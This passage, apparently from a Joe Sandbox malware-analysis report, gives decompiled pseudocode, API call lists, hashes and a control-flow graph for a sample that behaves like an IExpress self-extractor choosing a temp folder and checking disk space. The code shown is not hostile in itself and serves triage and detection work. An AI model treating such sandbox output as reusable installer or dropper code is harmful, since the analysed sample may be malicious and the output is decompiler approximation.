                                                                                                                                                                                                                                                					_t32 = E010E468F(_t82, _t109, 1);
                                                                                                                                                                                                                                                					__eflags = _t32;
                                                                                                                                                                                                                                                					if(_t32 != 0) {
                                                                                                                                                                                                                                                						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                                						__eflags = _t33;
                                                                                                                                                                                                                                                						if(_t33 == 0) {
                                                                                                                                                                                                                                                							 *0x10e9a30 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						LocalFree(_t109);
                                                                                                                                                                                                                                                						_t35 =  *0x10e8b3e; // 0x0
                                                                                                                                                                                                                                                						__eflags = _t35;
                                                                                                                                                                                                                                                						if(_t35 == 0) {
                                                                                                                                                                                                                                                							__eflags =  *0x10e8a24; // 0x0
                                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                                								L46:
                                                                                                                                                                                                                                                								_t101 = 0x7d2;
                                                                                                                                                                                                                                                								_t36 = E010E6517(_t82, 0x7d2, 0, E010E3210, 0, 0);
                                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                                								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								__eflags =  *0x10e9a30; // 0x0
                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                									goto L46;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t109 = 0x10e91e4;
                                                                                                                                                                                                                                                									_t40 = GetTempPathA(0x104, 0x10e91e4);
                                                                                                                                                                                                                                                									__eflags = _t40;
                                                                                                                                                                                                                                                									if(_t40 == 0) {
                                                                                                                                                                                                                                                										L19:
                                                                                                                                                                                                                                                										_push(_t82);
                                                                                                                                                                                                                                                										E010E1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                                										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                                										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                                											do {
                                                                                                                                                                                                                                                												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                                												__eflags = _t109 - 6;
                                                                                                                                                                                                                                                												if(_t109 == 6) {
                                                                                                                                                                                                                                                													L22:
                                                                                                                                                                                                                                                													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                                													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                                														goto L30;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L23;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													__eflags = _t109 - 3;
                                                                                                                                                                                                                                                													if(_t109 != 3) {
                                                                                                                                                                                                                                                														L23:
                                                                                                                                                                                                                                                														__eflags = _t109 - 2;
                                                                                                                                                                                                                                                														if(_t109 != 2) {
                                                                                                                                                                                                                                                															L28:
                                                                                                                                                                                                                                                															_t66 = _v268;
                                                                                                                                                                                                                                                															goto L29;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t66 = _v268;
                                                                                                                                                                                                                                                															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                                															if(_t66 == 0x41) {
                                                                                                                                                                                                                                                																L29:
                                                                                                                                                                                                                                                																_t60 = _t66 + 1;
                                                                                                                                                                                                                                                																_v268 = _t60;
                                                                                                                                                                                                                                                																goto L42;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                                																if(_t66 == 0x42) {
                                                                                                                                                                                                                                                																	goto L29;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t68 = E010E6952( &_v268);
                                                                                                                                                                                                                                                																	__eflags = _t68;
                                                                                                                                                                                                                                                																	if(_t68 == 0) {
                                                                                                                                                                                                                                                																		goto L28;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                                																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                                																			L30:
                                                                                                                                                                                                                                                																			_push(0);
                                                                                                                                                                                                                                                																			_t103 = 3;
                                                                                                                                                                                                                                                																			_t49 = E010E597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                                																			__eflags = _t49;
                                                                                                                                                                                                                                                																			if(_t49 != 0) {
                                                                                                                                                                                                                                                																				L33:
                                                                                                                                                                                                                                                																				_t50 = E010E2630(0,  &_v268, 1);
                                                                                                                                                                                                                                                																				__eflags = _t50;
                                                                                                                                                                                                                                                																				if(_t50 != 0) {
                                                                                                                                                                                                                                                																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																				_t88 =  &_v268;
                                                                                                                                                                                                                                                																				E010E658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                                																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                                																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                                																					__eflags = _t54;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																				__eflags = _t54;
                                                                                                                                                                                                                                                																				if(_t54 != 0) {
                                                                                                                                                                                                                                                																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                                																					_push(_t88);
                                                                                                                                                                                                                                                																					_t109 = 0x10e91e4;
                                                                                                                                                                                                                                                																					E010E1781(0x10e91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                                																					_t101 = 1;
                                                                                                                                                                                                                                                																					_t59 = E010E5467(0x10e91e4, 1, 0);
                                                                                                                                                                                                                                                																					__eflags = _t59;
                                                                                                                                                                                                                                                																					if(_t59 != 0) {
                                                                                                                                                                                                                                                																						goto L45;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						_t60 = _v268;
                                                                                                                                                                                                                                                																						goto L42;
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                                																					_v265 = 0;
                                                                                                                                                                                                                                                																					_v268 = _t60;
                                                                                                                                                                                                                                                																					goto L42;
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				_t65 = E010E2630(0,  &_v268, 1);
                                                                                                                                                                                                                                                																				__eflags = _t65;
                                                                                                                                                                                                                                                																				if(_t65 != 0) {
                                                                                                                                                                                                                                                																					goto L28;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t67 = E010E597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                                																					__eflags = _t67;
                                                                                                                                                                                                                                                																					if(_t67 == 0) {
                                                                                                                                                                                                                                                																						goto L28;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						goto L33;
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			goto L28;
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L22;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L47;
                                                                                                                                                                                                                                                												L42:
                                                                                                                                                                                                                                                												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                                											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										goto L43;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t101 = 1;
                                                                                                                                                                                                                                                										_t69 = E010E5467(0x10e91e4, 1, 3); // executed
                                                                                                                                                                                                                                                										__eflags = _t69;
                                                                                                                                                                                                                                                										if(_t69 != 0) {
                                                                                                                                                                                                                                                											goto L45;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t82 = 0x10e91e4;
                                                                                                                                                                                                                                                											_t70 = E010E2630(0, 0x10e91e4, 1);
                                                                                                                                                                                                                                                											__eflags = _t70;
                                                                                                                                                                                                                                                											if(_t70 != 0) {
                                                                                                                                                                                                                                                												goto L19;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t101 = 1;
                                                                                                                                                                                                                                                												_t82 = 0x10e91e4;
                                                                                                                                                                                                                                                												_t71 = E010E5467(0x10e91e4, 1, 1);
                                                                                                                                                                                                                                                												__eflags = _t71;
                                                                                                                                                                                                                                                												if(_t71 != 0) {
                                                                                                                                                                                                                                                													goto L45;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													do {
                                                                                                                                                                                                                                                														goto L19;
                                                                                                                                                                                                                                                														L43:
                                                                                                                                                                                                                                                														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                                														_push(4);
                                                                                                                                                                                                                                                														_t101 = 3;
                                                                                                                                                                                                                                                														_t82 =  &_v268;
                                                                                                                                                                                                                                                														_t44 = E010E597D(_t82, _t101, 1);
                                                                                                                                                                                                                                                														__eflags = _t44;
                                                                                                                                                                                                                                                													} while (_t44 != 0);
                                                                                                                                                                                                                                                													goto L2;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                                							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                                								_t72 = 1;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								__eflags =  *0x10e8b3f - _t35; // 0x0
                                                                                                                                                                                                                                                								_t72 = 0;
                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                									goto L10;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t101 = 0;
                                                                                                                                                                                                                                                							_t73 = E010E5467(0x10e8b3e, 0, _t72);
                                                                                                                                                                                                                                                							__eflags = _t73;
                                                                                                                                                                                                                                                							if(_t73 != 0) {
                                                                                                                                                                                                                                                								L45:
                                                                                                                                                                                                                                                								_t38 = 1;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t101 = 0x4be;
                                                                                                                                                                                                                                                								E010E44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                								goto L2;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t101 = 0x4b1;
                                                                                                                                                                                                                                                						E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						LocalFree(_t109);
                                                                                                                                                                                                                                                						 *0x10e9124 = 0x80070714;
                                                                                                                                                                                                                                                						goto L2;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t101 = 0x4b5;
                                                                                                                                                                                                                                                					E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					_t38 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L47:
                                                                                                                                                                                                                                                				return E010E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                                			}





































                                                                                                                                                                                                                                                0x010e57bd
                                                                                                                                                                                                                                                0x010e57bf
                                                                                                                                                                                                                                                0x010e57cd
                                                                                                                                                                                                                                                0x010e57cd
                                                                                                                                                                                                                                                0x010e57dd
                                                                                                                                                                                                                                                0x010e57e3
                                                                                                                                                                                                                                                0x010e57ef
                                                                                                                                                                                                                                                0x010e57f5
                                                                                                                                                                                                                                                0x010e57f8
                                                                                                                                                                                                                                                0x010e580a
                                                                                                                                                                                                                                                0x010e580a
                                                                                                                                                                                                                                                0x010e57fa
                                                                                                                                                                                                                                                0x010e5802
                                                                                                                                                                                                                                                0x010e5802
                                                                                                                                                                                                                                                0x010e580d
                                                                                                                                                                                                                                                0x010e580f
                                                                                                                                                                                                                                                0x010e5830
                                                                                                                                                                                                                                                0x010e5836
                                                                                                                                                                                                                                                0x010e583d
                                                                                                                                                                                                                                                0x010e584b
                                                                                                                                                                                                                                                0x010e5851
                                                                                                                                                                                                                                                0x010e5855
                                                                                                                                                                                                                                                0x010e585a
                                                                                                                                                                                                                                                0x010e585c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e585e
                                                                                                                                                                                                                                                0x010e585e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e585e
                                                                                                                                                                                                                                                0x010e5811
                                                                                                                                                                                                                                                0x010e5817
                                                                                                                                                                                                                                                0x010e5819
                                                                                                                                                                                                                                                0x010e581f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e581f
                                                                                                                                                                                                                                                0x010e5791
                                                                                                                                                                                                                                                0x010e5797
                                                                                                                                                                                                                                                0x010e579c
                                                                                                                                                                                                                                                0x010e579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e57a0
                                                                                                                                                                                                                                                0x010e57a9
                                                                                                                                                                                                                                                0x010e57ae
                                                                                                                                                                                                                                                0x010e57b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e57b0
                                                                                                                                                                                                                                                0x010e579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5769
                                                                                                                                                                                                                                                0x010e5762
                                                                                                                                                                                                                                                0x010e5753
                                                                                                                                                                                                                                                0x010e574f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e572e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5864
                                                                                                                                                                                                                                                0x010e5864
                                                                                                                                                                                                                                                0x010e5864
                                                                                                                                                                                                                                                0x010e5717
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56c3
                                                                                                                                                                                                                                                0x010e56c5
                                                                                                                                                                                                                                                0x010e56c9
                                                                                                                                                                                                                                                0x010e56ce
                                                                                                                                                                                                                                                0x010e56d0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56d6
                                                                                                                                                                                                                                                0x010e56d6
                                                                                                                                                                                                                                                0x010e56d8
                                                                                                                                                                                                                                                0x010e56dd
                                                                                                                                                                                                                                                0x010e56df
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56e1
                                                                                                                                                                                                                                                0x010e56e2
                                                                                                                                                                                                                                                0x010e56e4
                                                                                                                                                                                                                                                0x010e56e6
                                                                                                                                                                                                                                                0x010e56eb
                                                                                                                                                                                                                                                0x010e56ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56f3
                                                                                                                                                                                                                                                0x010e56f3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e586c
                                                                                                                                                                                                                                                0x010e5878
                                                                                                                                                                                                                                                0x010e587e
                                                                                                                                                                                                                                                0x010e5882
                                                                                                                                                                                                                                                0x010e5883
                                                                                                                                                                                                                                                0x010e5889
                                                                                                                                                                                                                                                0x010e588e
                                                                                                                                                                                                                                                0x010e588e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5896
                                                                                                                                                                                                                                                0x010e56ed
                                                                                                                                                                                                                                                0x010e56df
                                                                                                                                                                                                                                                0x010e56d0
                                                                                                                                                                                                                                                0x010e56c1
                                                                                                                                                                                                                                                0x010e56a8
                                                                                                                                                                                                                                                0x010e565b
                                                                                                                                                                                                                                                0x010e565b
                                                                                                                                                                                                                                                0x010e565d
                                                                                                                                                                                                                                                0x010e5669
                                                                                                                                                                                                                                                0x010e5669
                                                                                                                                                                                                                                                0x010e565f
                                                                                                                                                                                                                                                0x010e565f
                                                                                                                                                                                                                                                0x010e5665

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010E55CF
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010E5638
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 010E564C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010E5620
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E56B9
                                                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010E571E
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010E5737
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010E57CD
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010E57EF
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010E5802
                                                                                                                                                                                                                                                  • Part of subcall function 010E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010E2654
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010E5830
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010E5878
                                                                                                                                                                                                                                                  • Part of subcall function 010E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010E59A8
                                                                                                                                                                                                                                                  • Part of subcall function 010E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010E59AF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                • API String ID: 2436801531-752058184
                                                                                                                                                                                                                                                • Opcode ID: 043b7ae93401bc05e8733c1f9889c07bd3139377ff3e15e46f90ae129188c951
                                                                                                                                                                                                                                                • Instruction ID: cff82595484126ce4bf40ebe1460c108c5ba3033df425f3ff7bbb180b8dc6486
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 043b7ae93401bc05e8733c1f9889c07bd3139377ff3e15e46f90ae129188c951
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A812A79B042059EDB719A379D4CBFE76EDAB64708F0408E6E5C6E7180DFB48D818B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 324 10e597d-10e59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10e59dd-10e5a1b GetDiskFreeSpaceA 324->325 326 10e59bb-10e59d8 call 10e44b9 call 10e6285 324->326 328 10e5ba1-10e5bde memset call 10e6285 GetLastError FormatMessageA 325->328 329 10e5a21-10e5a4a MulDiv 325->329 341 10e5c05-10e5c14 call 10e6ce0 326->341 338 10e5be3-10e5bfc call 10e44b9 SetCurrentDirectoryA 328->338 329->328 332 10e5a50-10e5a6c GetVolumeInformationA 329->332 335 10e5a6e-10e5ab0 memset call 10e6285 GetLastError FormatMessageA 332->335 336 10e5ab5-10e5aca SetCurrentDirectoryA 332->336 335->338 340 10e5acc-10e5ad1 336->340 353 10e5c02 338->353 344 10e5ae2-10e5ae4 340->344 345 10e5ad3-10e5ad8 340->345 348 10e5ae6 344->348 349 10e5ae7-10e5af8 344->349 345->344 346 10e5ada-10e5ae0 345->346 346->340 346->344 348->349 352 10e5af9-10e5afb 349->352 354 10e5afd-10e5b03 352->354 355 10e5b05-10e5b08 352->355 356 10e5c04 353->356 354->352 354->355 357 10e5b0a-10e5b1b call 10e44b9 355->357 358 10e5b20-10e5b27 355->358 356->341 357->353 360 10e5b29-10e5b33 358->360 361 10e5b52-10e5b5b 358->361 360->361 363 10e5b35-10e5b50 360->363 364 10e5b62-10e5b6d 361->364 363->364 365 10e5b6f-10e5b74 364->365 366 10e5b76-10e5b7d 364->366 367 10e5b85 365->367 368 10e5b7f-10e5b81 366->368 369 10e5b83 366->369 370 10e5b96-10e5b9f 367->370 371 10e5b87-10e5b94 call 10e268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                			E010E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v788;
                                                                                                                                                                                                                                                				long _v792;
                                                                                                                                                                                                                                                				long _v796;
                                                                                                                                                                                                                                                				long _v800;
                                                                                                                                                                                                                                                				signed int _v804;
                                                                                                                                                                                                                                                				long _v808;
                                                                                                                                                                                                                                                				int _v812;
                                                                                                                                                                                                                                                				long _v816;
                                                                                                                                                                                                                                                				long _v820;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				signed int _t55;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				int _t69;
                                                                                                                                                                                                                                                				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x10e8004; // 0x71a8563c
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x10e9124 = E010E6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E010E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x10e9a34 & 0x00000008;
							if(( *0x10e9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x10e9a38; // 0x0
								_t110 =  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x10e9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E010E268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x10e9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x10e9a38;
                                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                                						}
